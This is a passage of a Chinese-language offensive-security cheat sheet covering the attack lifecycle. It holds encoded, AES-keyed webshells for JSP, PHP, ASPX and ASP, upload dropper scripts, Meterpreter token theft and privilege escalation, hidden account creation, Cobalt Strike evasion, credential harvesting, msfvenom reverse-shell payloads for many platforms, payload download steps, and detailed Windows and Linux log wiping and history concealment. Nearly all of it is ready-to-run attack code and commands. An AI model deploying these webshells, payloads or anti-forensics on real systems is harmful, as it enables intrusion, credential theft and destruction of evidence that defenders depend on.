echo 3c6a73703a726f6f7420786d6c6e733a6a73703d22687474703a2f2f6a6176612e73756e2e636f6d2f4a53502f50616765222076657273696f6e3d22312e32223e3c6a73703a6469726563746976652e7061676520696d706f72743d226a6176612e7574696c2e2a2c6a617661782e63727970746f2e2a2c6a617661782e63727970746f2e737065632e2a222f3e3c6a73703a6465636c61726174696f6e3e20636c617373205520657874656e647320436c6173734c6f616465727b5528436c6173734c6f616465722063297b73757065722863293b7d7075626c696320436c61737320672862797465205b5d62297b72657475726e2073757065722e646566696e65436c61737328622c302c622e6c656e677468293b7d7d3c2f6a73703a6465636c61726174696f6e3e3c6a73703a7363726970746c65743e537472696e67206b3d2265343565333239666562356439323562223b73657373696f6e2e70757456616c7565282275222c6b293b43697068657220633d4369706865722e676574496e7374616e6365282241455322293b632e696e697428322c6e6577205365637265744b657953706563282873657373696f6e2e67657456616c756528227522292b2222292e676574427974657328292c224145532229293b6e6577205528746869732e676574436c61737328292e676574436c6173734c6f616465722829292e6728632e646f46696e616c286e65772073756e2e6d6973632e4241534536344465636f64657228292e6465636f646542756666657228726571756573742e67657452656164657228292e726561644c696e6528292929292e6e6577496e7374616e636528292e657175616c732870616765436f6e74657874293b3c2f6a73703a7363726970746c65743e3c2f6a73703a726f6f743e|xxd -r -ps > 111.jspx
```
**(3)php**
```
echo PD9waHAgQGVycm9yX3JlcG9ydGluZygwKTtzZXNzaW9uX3N0YXJ0KCk7JGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7JF9TRVNTSU9OWydrJ109JGtleTtzZXNzaW9uX3dyaXRlX2Nsb3NlKCk7JHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7aWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSl7JHQ9ImJhc2U2NF8iLiJkZWNvZGUiOyRwb3N0PSR0KCRwb3N0LiIiKTtmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHskcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgfX1lbHNleyRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpO30kYXJyPWV4cGxvZGUoJ3wnLCRwb3N0KTskZnVuYz0kYXJyWzBdOyRwYXJhbXM9JGFyclsxXTtjbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2ludm9rZSgkcCkge2V2YWwoJHAuIiIpO319QGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7Pz4K|base64 -d > 111.php
echo 3c3f70687020406572726f725f7265706f7274696e672830293b73657373696f6e5f737461727428293b246b65793d2265343565333239666562356439323562223b245f53455353494f4e5b276b275d3d246b65793b73657373696f6e5f77726974655f636c6f736528293b24706f73743d66696c655f6765745f636f6e74656e747328227068703a2f2f696e70757422293b69662821657874656e73696f6e5f6c6f6164656428276f70656e73736c2729297b24743d226261736536345f222e226465636f6465223b24706f73743d24742824706f73742e2222293b666f722824693d303b24693c7374726c656e2824706f7374293b24692b2b29207b24706f73745b24695d203d2024706f73745b24695d5e246b65795b24692b312631355d3b207d7d656c73657b24706f73743d6f70656e73736c5f646563727970742824706f73742c2022414553313238222c20246b6579293b7d246172723d6578706c6f646528277c272c24706f7374293b2466756e633d246172725b305d3b24706172616d733d246172725b315d3b636c61737320437b7075626c69632066756e6374696f6e205f5f696e766f6b6528247029207b6576616c2824702e2222293b7d7d4063616c6c5f757365725f66756e63286e6577204328292c24706172616d73293b3f3ea|xxd -r -ps > 111.php
```
**(4)aspx**
```
echo PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiAlPjwlQEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5SZWZsZWN0aW9uIiU+PCVTZXNzaW9uLkFkZCgiayIsImU0NWUzMjlmZWI1ZDkyNWIiKTtieXRlW10gayA9IEVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMoU2Vzc2lvblswXSArICIiKSxjID0gUmVxdWVzdC5CaW5hcnlSZWFkKFJlcXVlc3QuQ29udGVudExlbmd0aCk7QXNzZW1ibHkuTG9hZChuZXcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5SaWpuZGFlbE1hbmFnZWQoKS5DcmVhdGVEZWNyeXB0b3IoaywgaykuVHJhbnNmb3JtRmluYWxCbG9jayhjLCAwLCBjLkxlbmd0aCkpLkNyZWF0ZUluc3RhbmNlKCJVIikuRXF1YWxzKHRoaXMpOyU+|base64 -d > 111.aspx
echo 3c25402050616765204c616e67756167653d2243232220253e3c2540496d706f7274204e616d6573706163653d2253797374656d2e5265666c656374696f6e22253e3c2553657373696f6e2e41646428226b222c226534356533323966656235643932356222293b627974655b5d206b203d20456e636f64696e672e44656661756c742e47657442797465732853657373696f6e5b305d202b202222292c63203d20526571756573742e42696e6172795265616428526571756573742e436f6e74656e744c656e677468293b417373656d626c792e4c6f6164286e65772053797374656d2e53656375726974792e43727970746f6772617068792e52696a6e6461656c4d616e6167656428292e437265617465446563727970746f72286b2c206b292e5472616e73666f726d46696e616c426c6f636b28632c20302c20632e4c656e67746829292e437265617465496e7374616e636528225522292e457175616c732874686973293b253e|xxd -r -ps > 111.aspx
```
**(5)asp**
```
echo PCUKUmVzcG9uc2UuQ2hhclNldCA9ICJVVEYtOCIgCms9ImU0NWUzMjlmZWI1ZDkyNWIiClNlc3Npb24oImsiKT1rCnNpemU9UmVxdWVzdC5Ub3RhbEJ5dGVzCmNvbnRlbnQ9UmVxdWVzdC5CaW5hcnlSZWFkKHNpemUpCkZvciBpPTEgVG8gc2l6ZQpyZXN1bHQ9cmVzdWx0JkNocihhc2NiKG1pZGIoY29udGVudCxpLDEpKSBYb3IgQXNjKE1pZChrLChpIGFuZCAxNSkrMSwxKSkpCk5leHQKZXhlY3V0ZShyZXN1bHQpCiU+|base64 -d > 111.asp
```
### 二次法
对于二次法,就是先传一个文件上传的小“shell”,然后通过指定方式进行上传其他文件。有一个好处就是,它本身不是木马病毒,就是一个写入文件的功能脚本,所以一般杀毒不会杀,这样我们就可以随意上传了。
**(a)JSP**
GET类型
**(1)god.jsp内容 (先遣部队)**
```
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
```
**(2)写jsp shell**
get类型写shell需要注意url编码。
```
http://ip/god.jsp?f=111.jsp&t=<%25@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%25><%25!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%25><%25if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%25>
```
**(3)写jspx shell**
```
http://ip/god.jsp?f=111.jspx&t=<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"><jsp:directive.page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"/><jsp:declaration> class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}</jsp:declaration><jsp:scriptlet>String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")%2B"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);</jsp:scriptlet></jsp:root>
```
POST类型
```
<%@ page language=”java” pageEncoding=”gbk”%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.OutputStream"/>
<jsp:directive.page import="java.io.FileOutputStream"/>
<% int i=0;String method=request.getParameter(“act”);if(method!=null&&method.equals(“yoco”)){String url=request.getParameter(“url”);String text=request.getParameter(“smart”);File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>
error
<%}}if(i==0){%>
ok
<%}%>
<form action='?act=yoco' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url"><br>
<textarea rows="20" cols="80" name="smart">
```
[![img](https://p5.ssl.qhimg.com/t01f1693061d1722e75.png)](https://p5.ssl.qhimg.com/t01f1693061d1722e75.png)
**(b)PHP**
GET类型
**(1)god.php内容 (先遣部队)**
```
<?php fwrite(fopen($_GET['filename'], "w"), $_GET['content']);?>
```
**(2)写php shell**
```
http://host/god.php?filename=111.php&content=<?php @error_reporting(0);session_start();$key="e45e329feb5d925b";$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i%2B%2B) {$post[$i] = $post[$i]^$key[$i%2B1%2615]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);?>
```
POST类型
```
<form method="post" enctype="multipart/form-data">Filename:<br /><input type="text" name="filename"><br />Content:<br /><textarea rows="20" cols="80" name="content"><?php fwrite(fopen($_POST['filename'], "w"), $_POST['content']);?>
```
[![img](https://p4.ssl.qhimg.com/t0180f99bff1cab790e.png)](https://p4.ssl.qhimg.com/t0180f99bff1cab790e.png)
**(c)ASPX**
对于aspx来说,此功能可能比较鸡肋,因为aspx写文件需要一定权限。
GET类型
**(1)god.aspx内容 (先遣部队)**
```
<%@ Page Language="C#" %><% System.IO.File.WriteAllText(System.AppDomain.CurrentDomain.BaseDirectory+"\\"+Request.QueryString["filename"], Request.QueryString["content"]);%>
```
**(2)写aspx shell**
```
http://host/god.aspx?filename=god.aspx&content=<%@ Page Language="C%23" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b");byte[] k = Encoding.Default.GetBytes(Session[0] %2B ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
```
# 鱼叉攻击
https://www.freebuf.com/articles/web/260391.html 邮件钓鱼入门到入土
https://www.chabug.org/tools/2017.html 邮件钓鱼学习
https://mp.weixin.qq.com/s?__biz=MjM5NzE1NjA0MQ%3D%3D&mid=2651202725&idx=1&sn=955fd4c6d80b320a57a3bc7b34fa24f8&scene=45 红蓝对抗之邮件钓鱼攻击
https://mp.weixin.qq.com/s/DIY-Q4GhCVRm0Cp4r3BPkw 红队技巧-网络钓鱼
# 权限维持
持久化和提权相关
## 提权检测脚本
unix-privesc-check:http://pentestmonkey.net/tools/audit/unix-privesc-check
linuxprivchecker: https://www.securitysift.com/download/linuxprivchecker.py
linEnum: http://qiniu.safe6.cn/LinEnum.sh
linux-exploit-suggester: https://github.com/HappyTreeFriend/linux-exploit-suggester
Windows提权辅助脚本: https://github.com/pentestmonkey/windows-privesc-check
## 利用msf提权
利用getsystem
(如果提权成功,进入shell后还是普通用户,就需要进行进程迁移)
```
getsystem
```
getgui添加管理员
```
run getgui -u test$ -p 123456
```
use incognito(加载incognito扩展)
利用加载incognito后的add_user命令添加管理员
![image-20210107132946355](img/image-20210107132946355.png)
利用incognito盗取令牌
```
meterpreter >use incognito 加载incoginto功能(用来盗窃目标主机的令牌或是假冒用户)
meterpreter >list_tokens -u 列出目标主机用户的可用令牌
meterpreter >list_tokens -g 列出目标主机用户组的可用令牌
meterpreter >impersonate_token DOMAIN_NAME\\USERNAME 假冒目标主机上的可用令牌,如meterpreter > impersonate_token QLWEB\\Administrato
meterpreter >execute -f cmd.exe -i -t #调用域权限shell
meterpreter > getuid
meterpreter>add_user 0xfa funny –h192.168.3.98 #在域控主机上添加账户
meterpreter>reg command # 在目标主机注册表中进行交互,创建,删除,查询等操作
meterpreter>setdesktop number #切换到另一个用户界面(该功能基于哪些用户已登录)
meterpreter>ps #查看目标机器进程,找出域控账户运行的进程ID
meterpreter>steal_token pid #盗窃给定进行的可用令牌并进行令牌假冒
meterpreter>drop_token pid #停止假冒当前令牌
```
![image-20210107133117637](img/image-20210107133117637.png)
利用hashdump(获取系统hash值并破解,前提是system)
![image-20210107133210042](img/image-20210107133210042.png)
利用mimikatz抓密码
利用smart_hashdump
## 安卓锁屏破解
安卓破解锁屏可以 拿key破解,或者删除key文件(/data/system/password.key)
## 交互shell获取
很多时候我们获取的shell并不是一个具有完整交互的shell,对于已经安装了python的系统,我们可以使用python提供的pty模块,只需要一行脚本就可以创建一个原生的终端
```text
python3 -c "import pty;pty.spawn('/bin/bash')"
python2 -c 'import pty;pty.spawn("/bin/sh")'
```
## 无交互账号添加
**chpasswd 方法**
```bash
useradd newuser;echo "newuser:password"|chpasswd
```
**useradd -p 方法**
```bash
useradd -p `openssl passwd 123456` guest
useradd -p "$(openssl passwd 123456)" guest
```
**echo -e 方法**
```text
useradd newuwer;echo -e "123456\n123456\n" |passwd newuser
```
## Cobalt Strike笔记
### argue参数污染
条件:使用adminstrator或system权限
场景:机器上线后,无法执行命令被av拦截。
Use:
```
argue [command] [fake arguments]
```
注意:fake arguments应该比真实的要长
例子:
污染powershell,污染完后即可正常执行powershell
```
argue powershell.exe xsdffsdfwfws
```
## bypass disable_function
参考文章:https://www.anquanke.com/post/id/208451#h2-8
https://www.cnblogs.com/tr1ple/p/11213732.html
常用方法:
```
1. 攻击后端组件,寻找存在命令注入的、web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞
2. 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的 popen()、proc_open()、pcntl_exec()
3. mod_cgi 模式,尝试修改 .htaccess,调整请求访问路由,绕过 php.ini 中的任何限制
4. 利用环境变量 LD_PRELOAD 劫持系统函数,让外部程序加载恶意 *.so,达到执行系统命令的效果
```
## 隧道工具
chisel:一款快速稳定的隧道工具 https://www.anquanke.com/post/id/234771
# 痕迹清理
## windows清理
### 日志清除
**windows 日志路径:**
```
系统日志:%SystemRoot%\System32\Winevt\Logs\System.evtx
安全日志:%SystemRoot%\System32\Winevt\Logs\Security.evtx
应用程序日志:%SystemRoot%\System32\Winevt\Logs\Application.evtx
日志在注册表的键:HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
```
**windows 日志清除方式:**
**(1)最简单粗暴的方式**
开始→运行,输入 `eventvwr` 进入事件查看器,右边栏选择清除日志。
**(2)命令行一键清除Windows事件日志**
```
PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"
Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname}
```
**(3)利用脚本停止日志的记录**
通过该脚本遍历事件日志服务进程(专用svchost.exe)的线程堆栈,并标识事件日志线程以杀死事件日志服务线程。
因此,系统将无法收集日志,同时事件日志服务似乎正在运行。
```
github项目地址:https://github.com/hlldz/Invoke-Phant0m
```
**(4)Windows单条日志清除**
该工具主要用于从Windows事件日志中删除指定的记录。
```
github项目地址:https://github.com/QAX-A-Team/EventCleaner
```
**(5)Windows日志伪造**
使用eventcreate这个命令行工具来伪造日志或者使用自定义的大量垃圾信息覆盖现有日志。
```
eventcreate -l system -so administrator -t warning -d "this is a test" -id 500
```
**IIS日志**
IIS默认日志路径:
```
%SystemDrive%\inetpub\logs\LogFiles\W3SVC1\
```
清除WWW日志:
```cmd
停止服务:net stop w3svc
删除日志目录下所有文件:del *.*
启用服务:net start w3svc
```
### 永久擦除技巧
***利用Windows自带命令进行安全擦除***
**(1)Shift+Delete快捷键永久删除**
直接删除文件,还是能在回收站找到的,使用Shift+Delete快捷键可以直接永久删除了。但是用数据恢复软件,删除的文件尽快恢复,否则新的文件存入覆盖了原来的文件痕迹就很难恢复了。
**(2)Cipher 命令多次覆写**
在删除文件后,可以利用Cipher 命令通过 /W 参数可反复写入其他数据覆盖已删除文件的硬盘空间,彻底删除数据防止被恢复。
比如,删除`D:\tools`目录下的文件,然后执行这条命令:
```
cipher /w:D:\tools
```
这样一来,D 盘上未使用空间就会被覆盖三次:一次 0x00、一次 0xFF,一次随机数,所有被删除的文件就都不可能被恢复了。
**(3)Format命令覆盖格式化**
Format 命令加上 /P 参数后,就会把每个扇区先清零,再用随机数覆盖。而且可以覆盖多次。比如:
```
format D: /P:8
```
这条命令表示把 D 盘用随机数覆盖 8 次。
### 清除远程桌面连接记录
当通过本机远程连接其他客户端或服务器后,会在本机存留远程桌面连接记录。代码保存为`clear.bat`文件,双击运行即可自动化清除远程桌面连接记录。
```cmd
@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\attrib Default.rdp -s -h
del Default.rdp
```
### 利用Metasploit 痕迹清除
(1)查看事件日志
```bash
meterpreter > run event_manager -i
[*] Retriving Event Log Configuration
Event Logs on System
====================
Name Retention Maximum Size Records
---- --------- ------------ -------
Application Disabled 20971520K 2149
HardwareEvents Disabled 20971520K 0
Internet Explorer Disabled K 0
Key Management Service Disabled 20971520K 0
Security Disabled 20971520K 1726
System Disabled 20971520K 3555
Windows PowerShell Disabled 15728640K 138
```
(2)清除事件日志(包括六种日志类型)
```bash
meterpreter > run event_manager -c
```
(3)另外,也可以输入clearv命令清除目标系统的事件日志(仅包含三种日志类型)
```bash
meterpreter > clearev
[*] Wiping 4 records from Application...
[*] Wiping 8 records from System...
[*] Wiping 7 records from Security...
```
## linux清理
### 日志清除
```cmd
/var/log/btmp 记录所有登录失败信息,使用lastb命令查看
/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看
/var/log/wtmp 记录所有用户的登录、注销信息,使用last命令查看
/var/log/utmp 记录当前已经登录的用户信息,使用w,who,users等命令查看
/var/log/secure 记录与安全相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志
```
**第一种方式:清空日志文件**
清除登录系统失败的记录:
```bash
[root@centos]# echo > /var/log/btmp
[root@centos]# lastb //查询不到登录失败信息
```
清除登录系统成功的记录:
```bash
[root@centos]# echo > /var/log/wtmp
[root@centos]# last //查询不到登录成功的信息
```
清除相关日志信息:
```cmd
清除用户最后一次登录时间:echo > /var/log/lastlog #lastlog命令
清除当前登录用户的信息:echo > /var/log/utmp #使用w,who,users等命令
清除安全日志记录:cat /dev/null > /var/log/secure
清除系统日志记录:cat /dev/null > /var/log/message
```
**第二种方式:删除/替换部分日志**
日志文件全部被清空,太容易被管理员察觉了,如果只是删除或替换部分关键日志信息,那么就可以完美隐藏攻击痕迹。
```bash
# 删除所有匹配到字符串的行,比如以当天日期或者自己的登录ip
sed -i '/自己的ip/'d /var/log/messages
# 全局替换登录IP地址:
sed -i 's/192.168.166.85/192.168.1.1/g' secure
```
**第三种方式:web日志**
**直接替换日志ip地址**
```bash
sed -i 's/192.168.166.85/192.168.1.1/g' access.log
```
**清除部分相关日志**
```bash
# 使用grep -v来把我们的相关信息删除
cat /var/log/nginx/access.log | grep -v evil.php > tmp.log
# 把修改过的日志覆盖到原日志文件
cat tmp.log > /var/log/nginx/access.log
```
### 永久擦除技巧
**(1)shred命令**
实现安全的从硬盘上擦除数据,默认覆盖3次,通过 -n指定数据覆盖次数。
```bash
[root@centos]# shred -f -u -z -v -n 8 1.txt
shred: 1.txt: pass 1/9 (random)...
shred: 1.txt: pass 2/9 (ffffff)...
shred: 1.txt: pass 3/9 (aaaaaa)...
shred: 1.txt: pass 4/9 (random)...
shred: 1.txt: pass 5/9 (000000)...
shred: 1.txt: pass 6/9 (random)...
shred: 1.txt: pass 7/9 (555555)...
shred: 1.txt: pass 8/9 (random)...
shred: 1.txt: pass 9/9 (000000)...
shred: 1.txt: removing
shred: 1.txt: renamed to 00000
shred: 00000: renamed to 0000
shred: 0000: renamed to 000
shred: 000: renamed to 00
shred: 00: renamed to 0
shred: 1.txt: removed
```
**(2)dd命令**
可用于安全地清除硬盘或者分区的内容。
```bash
dd if=/dev/zero of=要删除的文件 bs=大小 count=写入的次数
```
**(3)wipe**
Wipe 使用特殊的模式来重复地写文件,从磁性介质中安全擦除文件。
```bash
wipe filename
```
**(4)Secure-Delete**
Secure-Delete 是一组工具集合,提供srm、smem、sfill、sswap,4个安全删除文件的命令行工具。
```bash
srm filenames
fill filename
sswap /dev/sda1
smem
```
### 清除history记录
**第一种方式:**
(1)编辑history记录文件,删除部分不想被保存的历史命令。
```bash
vim ~/.bash_history
```
(2)清除当前用户的history命令记录
```bash
history -c
```
**第二种方式:**
(1)利用vim特性删除历史命令
```bash
#使用vim打开一个文件
vi test.txt
# 设置vim不记录命令,Vim会将命令历史记录,保存在viminfo文件中。
:set history=0
# 用vim的分屏功能打开命令记录文件.bash_history,编辑文件删除历史操作命令
vsp ~/.bash_history
# 清除保存.bash_history文件即可。
```
(2)在vim中执行自己不想让别人看到的命令
```bash
:set history=0
:!command
```
**第三种方式:**
通过修改配置文件/etc/profile,使系统不再保存命令记录。
```bash
HISTSIZE=0
```
**第四种方式:**
登录后执行下面命令,不记录历史命令(.bash_history)
```bash
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
```
### 隐藏远程SSH登陆记录
隐身登录系统,不会被w、who、last等指令检测到。
```bash
ssh -T root@192.168.0.1 /bin/bash -i
```
不记录ssh公钥在本地.ssh目录中
```bash
ssh -o UserKnownHostsFile=/dev/null -T user@192.168.0.1 /bin/bash –i
```
# 横向移动
- linux反弹shell后保持会话不断,可以借⽤screen保持会话
- 把反弹shell转为交互式的shell
```python
python -c 'import pty; pty.spawn("/bin/bash")' //⽣成py半交互式shell ctrl+Z
stty raw -echo fg
resetexport SHELL=bashexport TERM=xterm256-color stty rows 38 columns 116
```
## 内网常用命令
- whoami # 查看当前用户
- net user # 查看所有用户
- query user # 查看当前在线用户
- ipconfig /all # 查看当前主机的主机名/IP/DNS等信息
- route print # 查看路由表信息
- netstat -ano # 查看端口开放情况
- arp -a # 查看arp解析情况
- tasklist /svc # 查看进程及对应服务名
- net localgroup administrators # 查看管理员组成员
- systeminfo # 查看系统信息含补丁信息
- net use # 查看ipc连接情况
- net view # 查看匿名共享情况
- netsh firewall show state # 查看防火墙状态
- cmdkey /l # 查看当前保存的登陆凭证
## 密码搜集
- netsh wlan show profiles # 查看连接过的wifi名称
- netsh wlan show profile name="wifi名称" key=clear # 查看wifi的密码
- dir /a %userprofile%\AppData\Local\Microsoft\Credentials* # 查看RDP连接凭证
- dir /a /s /b "网站目录\*config*" > 1.txt # 数据库配置文件
- laZagne.exe all -oN # 本地wifi/浏览器等密码
- dir %APPDATA%\Microsoft\Windows\Recent # 查看最近打开的文档
- dir /s /a \域控IP\SYSVOL*.xml # 获取域里面所有机子的本地管理员账号密码
- linux密码快速查找
```bash
find / -name *.properties 2>/dev/null | grep WEB-INF
find / -name "*.properties" | xargs egrep -i "user|pass|pwd|uname|login|db_" find / -regex ".*\.properties\|.*\.conf\|.*\.config" | xargs grep -E "=jdbc:|pass="
find /webapp -regex ".*\.properties" -print 2>/dev/null | xargs grep -E "=jdbc:|rsync"
find / -regex ".*\.properties" -print 2>/dev/null
find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.sh" | xargs grep -E "=jdbc:|pass=|passwd="
find / -regex ".*\.xml\|.*\.properties\|.*\.conf\|.*\.config\|.*\.jsp" | xargs grep -E "setCipherKey"
```
- 可以使用如下命令寻找包含密码字段的文件:
`cd /webfindstr /s /m "password" *.*`
- 常用应用的默认配置路径:
```
Tomcat:CATALINA_HOME/conf/tomcat-users.xml
Apache:/etc/httpd/conf/httpd.conf
Nginx:/etc/nginx/nginx.conf
Wdcp:/www/wdlinux/wdcp/conf/mrpw.conf
Mysql:mysql\data\mysql\user.MYD
```
## 文件查找
https://www.anquanke.com/post/id/245019
文件查找:
**Windows**
```
for /r C: %i in (login.*) do @echo %i
where /R C: login.*
dir /s/a-d/b login.*
```
**Linux**
```
find / -name index.php
updatedb && locate index.php
```
源码查找
**Windows**
```
findstr /s /i /n /d:C:\ /c:"123123" *.txt
```
其中/d:是指定目录,在windows中一般为指定盘符,/c:则是指定文件内容,最后指定的是文件名字。
**(b)Linux**
```
find / -name "index.php" | xargs grep "111222"
```
## 连通性
- ping [www.baidu.com](http://www.baidu.com/) # ICMP连通性
- nslookup [www.baidu.com](http://www.baidu.com/) # DNS连通性
- curl [https://www.baidu.com](https://www.baidu.com/) # http连通性
- nc ip port # TCP连通性
# 域信息收集
## 常用信息收集
- net config workstation #查看当前登录域
- net user /domain # 获得所有域用户列表
- net view /domain # 查看所有的域
- net view /domain:XXX # 查看该域内所有主机
- net group /domain # 查看所有域用户组列表
- net group "domain computers" /domain # 查看域内所有的主机名
- net group "domain admins" /domain # 查看所有域管理员
- net group "domain controllers" /domain # 查看所有域控制器
- net group "enterprise admins" /domain # 查看所有企业管理员
- nltest /domain_trusts # 获取域信任信息
- net time /domain # 查看当前登录域
- net accounts /domain # 查看域密码策略
- dsquery server # 寻找目录中的域控制器
- netdom query pdc # 查看域控制器主机名
- wmic useraccount get /all #获取域内用户的详细信息
## 环境信息搜集
- nbtscan.exe xx.xx.xx.xx/24 # 查看c段机器
- csvde.exe -f 1.csv -k # 批量导入/导出AD用户
- setspn.exe -T xx.xx.xx.xx -Q */* # 查看当前域内所有spn
# 内网渗透合集
手把手教你入门内网渗透之一
1. 信息搜集+内网提权+隧道搭建
https://www.anquanke.com/post/id/221264
手把手教你入门内网渗透之二
1. 内网横向移动
https://www.anquanke.com/post/id/222269
手把手教你入门内网渗透之三
1. 持久化控制:后门+免杀
https://www.anquanke.com/post/id/223095
# payload生成
windows:
```
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o
payload.exe
```
mac:
```
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f macho -o payload.macho
```
android:
```
//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f apk -o payload.apk
```
powershell:
```
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
```
linux:
```bash
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f elf -o payload.elf
```
php:
```bash
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=
<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >>
shell.php
```
aspx:
```bash
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
```
jsp:
```bash
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻
击机端口 -f raw -o payload.jsp ```
```
war:
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -
o payload.war
```
nodejs:
```bash
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.js
```
python:
```bash
msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -
f raw -o payload.py
```
perl:
```bash
msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.pl
```
ruby:
```bash
msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.rb
```
lua:
```bash
msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.lua
```
windows shellcode:
```bash
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f c
```
linux shellcode:
```bash
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f c
```
# payload下载&白名单bypass
参考:
https://xz.aliyun.com/t/5768 渗透测试中弹shell的多种方式及bypass
https://micro8.gitbook.io/micro8/ 大佬经验十年总结
## python文件服务器
```
python2 -m SimpleHTTPServer 8081
python3 -m http.server 8081
```
**如果是单纯的下载payload推荐使用powershell或certutil进行下载,但是记得清理缓存**
## ftp
**下载姿势**
```bash
echo open 192.168.1.1 21> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo ftp>> ftp.txt
echo GET 1.exe >> ftp.txt
ftp -s:ftp.txt
```
需要搭建ftp服务器,用ftp下载防火墙会弹框拦截,使用前记得要先添加防火墙规则
**msf攻击**
msf启用监听
```
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.43.231
msf exploit(multi/handler) > set AutoRunScript migrate -f
msf exploit(multi/handler) > set lport 53
msf exploit(multi/handler) > exploit
```
![windows下基于白名单获取shell的方法整理(下)](img/bdf2a4380b78457aa0a59504fe516d04)
生成payload
```
